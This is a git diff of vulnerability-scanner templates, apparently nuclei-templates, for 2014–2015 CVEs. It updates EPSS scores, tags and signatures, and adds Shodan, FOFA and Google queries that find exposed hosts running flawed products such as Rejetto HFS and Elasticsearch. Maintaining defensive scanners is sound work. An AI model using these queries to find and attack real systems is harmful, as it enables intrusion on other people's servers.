+# digest: 4a0a00473045022100f262c17c2d38c200c4f64eaff624d6ca4903149a5c9379d1b1de592f06230189022015ccc14685fc5f1018e9399f29d60987d59ed2466775e62810caa949ec8cc514:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-6287.yaml b/http/cves/2014/CVE-2014-6287.yaml
index 5b7d648f67..6c9f4ac9a0 100644
--- a/http/cves/2014/CVE-2014-6287.yaml
+++ b/http/cves/2014/CVE-2014-6287.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 9.8
cve-id: 'CVE-2014-6287'
cwe-id: CWE-94
- epss-score: 0.97289
- epss-percentile: 0.99851
+ epss-score: 0.97341
+ epss-percentile: 0.99889
cpe: cpe:2.3:a:rejetto:http_file_server:*:*:*:*:*:*:*:*
metadata:
verified: true
@@ -30,6 +30,7 @@ info:
vendor: rejetto
product: http_file_server
shodan-query: http.favicon.hash:2124459909
+ fofa-query: icon_hash=2124459909
tags: cve2014,cve,packetstorm,msf,hfs,rce,kev,rejetto
variables:
str1: '{{rand_base(6)}}'
@@ -57,4 +58,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204bde1c3f42a0592f723d6907f857453ffc1cbaeade6b35e9f6d475fdbdf132c9022100e2f30a443e5904e106b93955a85dde211a5249aead2a75f789325c42c40efadc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207c77d8dec5838899fb0b5bcaaa704ce03794019ac3eee7ab38c6fc2b89ea7cb802206d118db82dbc520eacf12ac8e3bdd3dace23e753cf0cf2d06c6e23342a0c7273:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml
index 2eb92670c9..ec7d0a1987 100644
--- a/http/cves/2014/CVE-2014-8676.yaml
+++ b/http/cves/2014/CVE-2014-8676.yaml
@@ -28,6 +28,8 @@ info:
max-request: 1
vendor: soplanning
product: soplanning
+ shodan-query: http.html:"soplanning"
+ fofa-query: body="soplanning"
tags: cve2014,cve,packetstorm,edb,seclists,soplanning,lfi,xss
http:
@@ -44,4 +46,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402206611bdf8fb4c40e1d04dce364dce4905c11bbe2266ca7465719b55cf98d7949602207babdd83687bb04e4175613fe704b5c7b653537bbc366a9c8822e295b1cf16fc:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220715636195b40ff991c03fdb2384200a99a22e309ab3dc2f6cb3f7a2c6c28719a02206a0582db5e2daabfcb4749bc783bb844f0733b0716db0ee37e9a8e8780fdc9ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml
index 321ab2db3e..57bc690ac5 100644
--- a/http/cves/2014/CVE-2014-8682.yaml
+++ b/http/cves/2014/CVE-2014-8682.yaml
@@ -29,6 +29,8 @@ info:
vendor: gogits
product: gogs
shodan-query: title:"Sign In - Gogs"
+ google-query: intitle:"sign in - gogs"
+ fofa-query: title="sign in - gogs"
tags: cve2014,cve,gogs,seclists,packetstorm,edb,sqli,gogits
http:
@@ -49,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100814319b746978b7ca718b8e25ca06acff4cad96360cbdef067269198629865cc02203d59471b74f7036f8c629f2e3a72650ce063c6c2bcf30ed8a1165aad0b4935ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200f79db8dff76965b8f3ab5107b55776d293d39132096d384d82363a216e98fc2022100d76092c87bcc34cda20e601f4e6b01bfe01927bded785626ba5a85772fdfcfdb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-8799.yaml b/http/cves/2014/CVE-2014-8799.yaml
index dd9b9f18af..3b501be0a0 100644
--- a/http/cves/2014/CVE-2014-8799.yaml
+++ b/http/cves/2014/CVE-2014-8799.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-8799
cwe-id: CWE-22
epss-score: 0.17844
- epss-percentile: 0.96039
+ epss-percentile: 0.9615
cpe: cpe:2.3:a:dukapress:dukapress:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -50,4 +50,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402204edbc71eff8a4e2f830a6b91adba5649b330babc92cb13db3bc72f9eeadeeaed022032a4104312eed8dab0af4f004d133ef1c781de314cd466bcef35194a980c55c1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022012ec28b7ae2fa5ce33f3b849a618ce6d294d4f289985e633959927d2448b8cad022100ece7f22daa65a7bd0eebb32142e90b3ce9f976cade0071f9690cdc7e62bac780:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml
index faf2b9414d..1f1d88f537 100644
--- a/http/cves/2014/CVE-2014-9180.yaml
+++ b/http/cves/2014/CVE-2014-9180.yaml
@@ -16,8 +16,8 @@ info:
cvss-score: 5
cve-id: CVE-2014-9180
cwe-id: CWE-601
- epss-score: 0.00285
- epss-percentile: 0.6809
+ epss-score: 0.00214
+ epss-percentile: 0.59443
cpe: cpe:2.3:a:eleanor-cms:eleanor_cms:-:*:*:*:*:*:*:*
metadata:
verified: true
@@ -25,6 +25,7 @@ info:
vendor: eleanor-cms
product: eleanor_cms
shodan-query: html:"eleanor"
+ fofa-query: body="eleanor"
tags: cve2014,cve,packetstorm,eleanor,cms,redirect,eleanor-cms
http:
@@ -37,4 +38,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 490a004630440220446a71d044997875a6e25df63044f0a0857752c262af93c4d2ad395a2e57d16c0220515a5679ead82478d29fb9a3415e6a433b25596bd8f56f8aabdb0724757cd73c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220547a737881ebbba547bf355be3f161d38a9bd2f10b8811e29f6958aef12c49ab022100ee951982cbbea4df817b3881a1db7a04abc9cb8ab64d195f5b7f9046ac6d99b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml
index 4e01a22313..ab4eeed546 100644
--- a/http/cves/2014/CVE-2014-9444.yaml
+++ b/http/cves/2014/CVE-2014-9444.yaml
@@ -13,13 +13,14 @@ info:
- https://wpscan.com/vulnerability/f0739b1e-22dc-4ca6-ad83-a0e80228e3c7
- https://nvd.nist.gov/vuln/detail/CVE-2014-9444
- http://packetstormsecurity.com/files/129749/WordPress-Frontend-Uploader-0.9.2-Cross-Site-Scripting.html
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
cvss-score: 4.3
cve-id: CVE-2014-9444
cwe-id: CWE-79
- epss-score: 0.00287
- epss-percentile: 0.65501
+ epss-score: 0.00619
+ epss-percentile: 0.78788
cpe: cpe:2.3:a:frontend_uploader_project:frontend_uploader:0.9.2:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -48,4 +49,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100d63e192fa95e5914ae00c6a2f55a96eef98aeb85eee3f4171b3af2f9d3e52f6d0220578a283149c3a3345f1443cffed1f5bfee0ea458d32f450beabaebe2500f1e4b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022047b35642f70a3b53211ace11f861e4765249fb4244c05f753ab279f89879e116022100c4a70fe22de8bb7f0a109f44b262232d559cc447faac3c2b2cb095908d770b8e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml
index 20225da1f4..326cfe37ed 100644
--- a/http/cves/2014/CVE-2014-9606.yaml
+++ b/http/cves/2014/CVE-2014-9606.yaml
@@ -13,13 +13,14 @@ info:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
- https://nvd.nist.gov/vuln/detail/CVE-2014-9606
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-9606
cwe-id: CWE-79
epss-score: 0.00102
- epss-percentile: 0.41261
+ epss-percentile: 0.41716
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -47,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a0048304602210080cd960c9becf8e609afed2036ce9d79e616dceacf52cf5865510c5c1f59220b022100d6ab15602efd08d89ec0f184f8f09651aa1a5b71bbae67567e34933901ec3cc9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f25f32406e3e481ad9b2f50ea3be976ecd9a39128b79d8d6e6fc08bfddd80bac022100c8d8159a08640e3530b34a713a6f1112f13caa7fbb39ae1c1f45b218af9e2c6f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml
index e00d43f46f..32545626db 100644
--- a/http/cves/2014/CVE-2014-9607.yaml
+++ b/http/cves/2014/CVE-2014-9607.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2014-9607
cwe-id: CWE-79
epss-score: 0.00102
- epss-percentile: 0.40591
+ epss-percentile: 0.41716
cpe: cpe:2.3:a:netsweeper:netsweeper:4.0.3:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -48,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201aa63eb48fb97f26c497ba51d0b774678d7f99181ff592e8245940df0586f135022100ec53c24be8fe6c849d5700ba693ce9821767849c3c764eef8459fe2120e546fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f8c58b7ce75987ee10d4a7a2dc87f86c3d65bd50843fac13a7b0d0641c1f20a00220570389114da5233ffcd4ccc05632c183ff57e6dc07babf80b21d2818decee813:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml
index 5561db4d36..fafa68c4cf 100644
--- a/http/cves/2014/CVE-2014-9608.yaml
+++ b/http/cves/2014/CVE-2014-9608.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2014-9608
cwe-id: CWE-79
epss-score: 0.00102
- epss-percentile: 0.40591
+ epss-percentile: 0.41716
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -56,4 +56,4 @@ http:
- type: status
status:
- 200
-# digest: 490a0046304402203ce0d1e40367b31eefec71137f6bf16ab3b345be2f2b7a7797a9784aa65eb723022014b4a8a7ae8933afffede51f1d4fd8208e04a33bebae97310111ca8fbbf01ab8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100df4d1ce1a9c4a7c7ec1f9f7c4a2dea139740caed42f72b048f16634be7028fcb022040deb4ef640f0efcd128fe37ceaa1b08b48219bddb3695ccbd4789562061356f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml
index 48e1769a8f..1e5165fe0c 100644
--- a/http/cves/2014/CVE-2014-9614.yaml
+++ b/http/cves/2014/CVE-2014-9614.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2014-9614
cwe-id: CWE-798
epss-score: 0.01433
- epss-percentile: 0.85223
+ epss-percentile: 0.8655
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -55,4 +55,4 @@ http:
- type: status
status:
- 302
-# digest: 4a0a004730450221008ca7c8e2f8971e12c194148bb00ee6af61b7f7402b62a5b0e4b98d020d96eeca0220052a3891b6a4b52003d8e309f5a8c7af3005bbce6e11e69a25f6908273c8bebf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402202f2136d9d8c06c91744feb7dc1c42ffe6f13823841c3487a6844921ceaf142b2022003c2cbb6c9e75bae775fe0fc06e8ee12133e6d53c40b011a5d8b35cac33287ed:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9617.yaml b/http/cves/2014/CVE-2014-9617.yaml
index 2be4ac953e..93d5d6b2c2 100644
--- a/http/cves/2014/CVE-2014-9617.yaml
+++ b/http/cves/2014/CVE-2014-9617.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2014-9617
cwe-id: CWE-601
epss-score: 0.00109
- epss-percentile: 0.43869
+ epss-percentile: 0.44022
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -38,4 +38,4 @@ http:
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
-# digest: 490a00463044022006182b3df441f29283ee673c281717eda7a779b431ecc2f9cb6f9a85fd6dfc88022074682e3692cd0985fdc463c552d02b2315af9ba8dd367b8085661de9f9b79108:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201052d6d8b289bb24eb8e28b9777c3fe5d3dba8762e0a7d85949710ac75c87ecc0220548e894c1cd3f8a1cb3c9e71d58c48b458039bb761d70f2f5037e5e1a39f4afd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2014/CVE-2014-9618.yaml b/http/cves/2014/CVE-2014-9618.yaml
index ccc915382c..1882749a65 100644
--- a/http/cves/2014/CVE-2014-9618.yaml
+++ b/http/cves/2014/CVE-2014-9618.yaml
@@ -15,13 +15,14 @@ info:
- https://nvd.nist.gov/vuln/detail/CVE-2014-9618
- https://www.exploit-db.com/exploits/37933/
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2014-9618
cwe-id: CWE-287
epss-score: 0.03433
- epss-percentile: 0.90527
+ epss-percentile: 0.91476
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -47,4 +48,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a004730450220110e65478297a1f1e19a5e98a5f65f7e6bb674ad23a3824ba952a06b72b3736f02210088cd00b58b916cf718bfd03fd71bfd051e0f737bec255d7752bfbf60ff169f36:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e2c30dafcfaf747bbc1516a801b6f0c0418d72acb0e771939826193d9a93291502204f311d75a2cb0ae12aef112c90a354bd53451d367c99671aed2bd4bd2c4f8621:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1000005.yaml b/http/cves/2015/CVE-2015-1000005.yaml
index 99fd990224..92169aca0b 100644
--- a/http/cves/2015/CVE-2015-1000005.yaml
+++ b/http/cves/2015/CVE-2015-1000005.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-1000005
cwe-id: CWE-22
- epss-score: 0.047
- epss-percentile: 0.92455
+ epss-score: 0.05258
+ epss-percentile: 0.93027
cpe: cpe:2.3:a:candidate-application-form_project:candidate-application-form:1.0:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -45,4 +45,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022100c57b8e7f4d7cc5e46b9b3b53dad4d8bdbb23b3395a0e7e318ae97e2084be2eea022029f219dc09c13c76fdbf11a2722ed0594785fa3517c8c439fcd5ea6da661a02f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204f1f475fa4f52e36af22f8c1fd174fd227db3220068dd25993f009d04ecac0700220473d7e9f0bccadbcb97eaac77b5bde7a39bf0a25882afc8889ee9f4996cc1805:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1427.yaml b/http/cves/2015/CVE-2015-1427.yaml
index 444756f589..5669854804 100644
--- a/http/cves/2015/CVE-2015-1427.yaml
+++ b/http/cves/2015/CVE-2015-1427.yaml
@@ -20,13 +20,14 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-1427
cwe-id: CWE-284
- epss-score: 0.85974
- epss-percentile: 0.98485
+ epss-score: 0.87385
+ epss-percentile: 0.98629
cpe: cpe:2.3:a:elasticsearch:elasticsearch:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: elasticsearch
product: elasticsearch
+ fofa-query: index_not_found_exception
tags: cve2015,cve,packetstorm,elastic,rce,elasticsearch,kev
http:
@@ -64,4 +65,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100d29b625c44598d6fd40ec90007af146d602b03e0287b866e32ee90257f77d1da022100c02ac12b1515f84fdbe501346868b0b6d8e31333da3750a76b2e01f9e0f40642:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f0a87139a45778ff044c46bad3780d8ac438f8a75ad5be9dae57584656afba3a022100eac3592c45cd386f902a94e07a5c7915903a6e1bdfd7b5d8a8bdf2af67fbaa38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1503.yaml b/http/cves/2015/CVE-2015-1503.yaml
index 611ec88318..4ed01ed159 100644
--- a/http/cves/2015/CVE-2015-1503.yaml
+++ b/http/cves/2015/CVE-2015-1503.yaml
@@ -28,6 +28,8 @@ info:
vendor: icewarp
product: mail_server
shodan-query: title:"icewarp"
+ fofa-query: title="icewarp server administration"
+ google-query: intitle:"icewarp server administration"
tags: cve2015,cve,lfi,mail,packetstorm,icewarp
http:
@@ -45,4 +47,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201bd23514796529bf6c27e2ed45c08b9340e59a12f04603253332ae63240298e60221008e8246877e3b62ffa7b8953c44fa788db96ddf30e232a558beca8f4d501588b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008d7b2c5ed672ef985ed540bfcbc7c4a97cf1f627eacd0da9ebe8a57297962be402210097c2112afd61ccd9846d28ee66036895ff0f555e75161377c5269319f214284e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1579.yaml b/http/cves/2015/CVE-2015-1579.yaml
index 8b1cbf521f..0a62a16182 100644
--- a/http/cves/2015/CVE-2015-1579.yaml
+++ b/http/cves/2015/CVE-2015-1579.yaml
@@ -21,8 +21,8 @@ info:
cvss-score: 5
cve-id: CVE-2015-1579
cwe-id: CWE-22
- epss-score: 0.90145
- epss-percentile: 0.9855
+ epss-score: 0.82302
+ epss-percentile: 0.98398
cpe: cpe:2.3:a:elegant_themes:divi:-:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
@@ -53,4 +53,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502204becd81302d4f8601be8cd91ccb030ee0b22d4f05138929b5c4fe80ad731504d0221008064061fb4305f15402851e4ad475a5ded2bd8427f87cb7c402471f54c9fc6b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009fcfcc25ab96536af2b8e2b1cae82b3f057a0f60ebf41c8d3f6f4bd029879ef302206acf0ff4e2fd19087e94cb9beb1a8add10fabd4a24597cdf7bd81207a40ae383:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1635.yaml b/http/cves/2015/CVE-2015-1635.yaml
index 4398251cff..a3614de746 100644
--- a/http/cves/2015/CVE-2015-1635.yaml
+++ b/http/cves/2015/CVE-2015-1635.yaml
@@ -17,8 +17,8 @@ info:
cvss-score: 10
cve-id: CVE-2015-1635
cwe-id: CWE-94
- epss-score: 0.97537
- epss-percentile: 0.99992
+ epss-score: 0.9754
+ epss-percentile: 0.99994
cpe: cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*
metadata:
verified: true
@@ -48,4 +48,4 @@ http:
part: header
words:
- "Microsoft"
-# digest: 4a0a00473045022100a635f022b45e7a586ad5e4a4564a246654390e2469d4729272954c932b441eab02204e4776dc6153c0fcae6eaca611da6998b1e8e23d7bef84872c029f267912cd1b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100f63535ff8dd3b0fc92073a3509d0a0fd7a6b3c9d6ed1578186ee18018a502f600220255af0daf50f7a5e4cfb146a9ace9e26de91185c1c8a07724820caba72ac8ac3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-1880.yaml b/http/cves/2015/CVE-2015-1880.yaml
index da134bc3b4..4023c545ce 100644
--- a/http/cves/2015/CVE-2015-1880.yaml
+++ b/http/cves/2015/CVE-2015-1880.yaml
@@ -27,6 +27,8 @@ info:
max-request: 1
vendor: fortinet
product: fortios
+ shodan-query: http.html:"/remote/login" "xxxxxxxx"
+ fofa-query: body="/remote/login" "xxxxxxxx"
tags: cve2015,cve,xss,fortigates,intrusive,fortinet
http:
@@ -49,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 4b0a00483046022100fbd94b21f5439ca4ec407e9189271984eee7263b4225ff0c73f83bdad8a7d5b202210088a587ab57ec51554054af59f5f81cc6d51732d5c6f5928c95b3c4d7090af0df:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207d3f317fe5b4820f58a1472f22755f24ea4913e7d04c71281acdc16a6ea4dcf102210096e6b0e040652e05835ce91e53d560d472493b09560c17536225a2f257146642:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2068.yaml b/http/cves/2015/CVE-2015-2068.yaml
index db07a3904a..cf6695e912 100644
--- a/http/cves/2015/CVE-2015-2068.yaml
+++ b/http/cves/2015/CVE-2015-2068.yaml
@@ -20,7 +20,7 @@ info:
cve-id: CVE-2015-2068
cwe-id: CWE-79
epss-score: 0.00146
- epss-percentile: 0.4958
+ epss-percentile: 0.50455
cpe: cpe:2.3:a:magmi_project:magmi:-:*:*:*:*:magento_server:*:*
metadata:
verified: true
@@ -51,4 +51,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a0047304502201d5b527a7afaf9cd2298eecea9050abd7eb528161ddd9c8f6b3bb07fd1b3d401022100bc96b4607561b72a7ff1ebefd67594db87f556150aef7cee914c442f33c921bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502200083eadbbf1f9e019bcd0a93d62e9285ceb5146a095784729a2b8f360e882060022100e7722c672319e299e2e4eda6bbf7ee1e8442c9c123f63aee02d34ad2ea776cab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2080.yaml b/http/cves/2015/CVE-2015-2080.yaml
index affbf5e835..892a6b23ea 100644
--- a/http/cves/2015/CVE-2015-2080.yaml
+++ b/http/cves/2015/CVE-2015-2080.yaml
@@ -18,13 +18,14 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-2080
cwe-id: CWE-200
- epss-score: 0.95465
- epss-percentile: 0.99329
+ epss-score: 0.95345
+ epss-percentile: 0.99356
cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: fedoraproject
product: fedora
+ shodan-query: cpe:"cpe:2.3:o:fedoraproject:fedora"
tags: cve2015,cve,jetty,packetstorm,fedoraproject
http:
@@ -45,4 +46,4 @@ http:
- type: status
status:
- 400
-# digest: 490a0046304402205c8d0476a6f051a3ec41adbc3bbb3c3df32392a0a2d380ba4f7a3c845cca139702206f3666b9266c8b39bb342ff44104fe3ccc5b32839313e08d76981ce2ebdc12e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502210090b66032656a55663721d240362a3514462a90c3228a98ac576768f9833c27d2022070f821ea45564431e8bea158126f890008c77c8c569bd6a7047652639d07259e:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2166.yaml b/http/cves/2015/CVE-2015-2166.yaml
index 045252b92f..797b5bbf5b 100644
--- a/http/cves/2015/CVE-2015-2166.yaml
+++ b/http/cves/2015/CVE-2015-2166.yaml
@@ -20,8 +20,8 @@ info:
cvss-score: 5
cve-id: CVE-2015-2166
cwe-id: CWE-22
- epss-score: 0.23272
- epss-percentile: 0.96445
+ epss-score: 0.29639
+ epss-percentile: 0.96917
cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:*
metadata:
max-request: 1
@@ -44,4 +44,4 @@ http:
- type: status
status:
- 200
-# digest: 4a0a00473045022005ae10e49409ebd18ff174804d7b53c1ab9d1306850dfaff9163b785375be21c022100a6d97e3ba5c48553ae5e792432ca523f33cda27717ef085f3013c21e3dce7465:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008ee6af0a974f33dcc7b5fe8f9f4cb703696f43a32588369a8fc83104b162ff3002206ff427f007fb430ad833f19fcc71c4523a959037201b4610e8a5848b66f97a92:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2196.yaml b/http/cves/2015/CVE-2015-2196.yaml
index 2e0903f253..7e901fa40c 100644
--- a/http/cves/2015/CVE-2015-2196.yaml
+++ b/http/cves/2015/CVE-2015-2196.yaml
@@ -19,8 +19,8 @@ info:
cvss-score: 7.5
cve-id: CVE-2015-2196
cwe-id: CWE-89
- epss-score: 0.0025
- epss-percentile: 0.6433
+ epss-score: 0.00253
+ epss-percentile: 0.65124
cpe: cpe:2.3:a:web-dorado:spider_calendar:1.4.9:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -44,4 +44,4 @@ http:
- 'status_code == 200'
- 'contains(body, "{\"status\":true,\"data\"")'
condition: and
-# digest: 4b0a00483046022100bd7e63311d4cf6f8337571a1a59b5d7011819ff9c6b2ff98931e30318db0adf3022100ffe10684ebe0641b20298ef67f1e62873e23b9e6fc44edd1b0cbc5127ab7103b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100daa723288b7ba31445615bf88d494dcea46bb73348e396a696dc4d3b653ff0a80220203c1979571b1052fe8581945a95d5755c8615d7b21138426b14f4a67c8867c2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2755.yaml b/http/cves/2015/CVE-2015-2755.yaml
index 1c126b301d..af2ccb1f13 100644
--- a/http/cves/2015/CVE-2015-2755.yaml
+++ b/http/cves/2015/CVE-2015-2755.yaml
@@ -22,7 +22,7 @@ info:
cve-id: CVE-2015-2755
cwe-id: CWE-352
epss-score: 0.01828
- epss-percentile: 0.87952
+ epss-percentile: 0.88216
cpe: cpe:2.3:a:ab_google_map_travel_project:ab_google_map_travel:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
@@ -30,7 +30,7 @@ info:
vendor: ab_google_map_travel_project
product: ab_google_map_travel
framework: wordpress
- tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project
+ tags: packetstorm,cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project
http:
- raw:
@@ -56,4 +56,4 @@ http:
- 'contains(body_2, "")'
- 'contains(body_2, "ab-google-map-travel")'
condition: and
-# digest: 4b0a00483046022100a8cc9f76a8f68db2a3748140015caa53d81843095f1e655982d65ba4131f12a30221008e49c9ca4169a002b1dbb5d8bc1e327243553007a41e8adfc1e6222a47cab0e2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100dda7ff953b221b559dcea855c1c3673c49450581b89d2b7eb7941894951394fa022100cb6fb992be83baf795c00ba8f2d800eeb418a3a9033cff48b2064f725119f3f7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2015/CVE-2015-2807.yaml b/http/cves/2015/CVE-2015-2807.yaml
index 7f5783fa83..d44fdec3f1 100644
--- a/http/cves/2015/CVE-2015-2807.yaml
+++ b/http/cves/2015/CVE-2015-2807.yaml
@@ -21,7 +21,7 @@ info:
cve-id: CVE-2015-2807
cwe-id: CWE-79
epss-score: 0.00294
- epss-percentile: 0.68624
+ epss-percentile: 0.69186
cpe: cpe:2.3:a:documentcloud:navis_documentcloud:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
@@ -30,7 +30,6 @@ info:
framework: wordpress
google-query: inurl:"/wp-content/plugins/navis-documentcloud"
tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
-
flow: http(1) && http(2)
http:
@@ -66,4 +65,4 @@ http:
- type: status
status:
- 200
